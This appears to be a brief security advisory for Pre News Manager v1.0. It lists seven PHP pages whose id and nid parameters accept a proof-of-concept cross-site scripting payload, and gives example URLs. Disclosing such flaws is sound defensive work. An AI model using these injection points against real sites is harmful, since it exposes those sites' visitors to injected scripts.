Pre News Manager v1.0
Pre News Manager v1.0
Homepage:
http://www.preprojects.com/news.asp
Description:
Effected files:
index.php
news_detail.php
email_story.php
thankyou.php
printable_view.php
tella_friend.php
send_comments.php
Exploits & Vulns:
XSS Vulnerabilities:
By inserting <IMG%20"""><SCRIPT>alert("XSS")</SCRIPT>"> onto the id and nid
variables we are able to create a
XSS attack.
http://www.example.com/news%20manager/index.php?id=[XSS]
http://www.example.com/news%20manager/news_detail.php?nid=[XSS]
http://www.example.com/news%20manager/email_story.php?nid=[XSS]
http://www.example.com/news%20manager/thankyou.php?nid=[XSS]
http://www.example.com/news%20manager/printable_view.php?nid=[XSS]
http://www.example.com/news%20manager/tella_friend.php?nid=[XSS]
http://www.example.com/news%20manager/send_comments.php?nid=[XSS]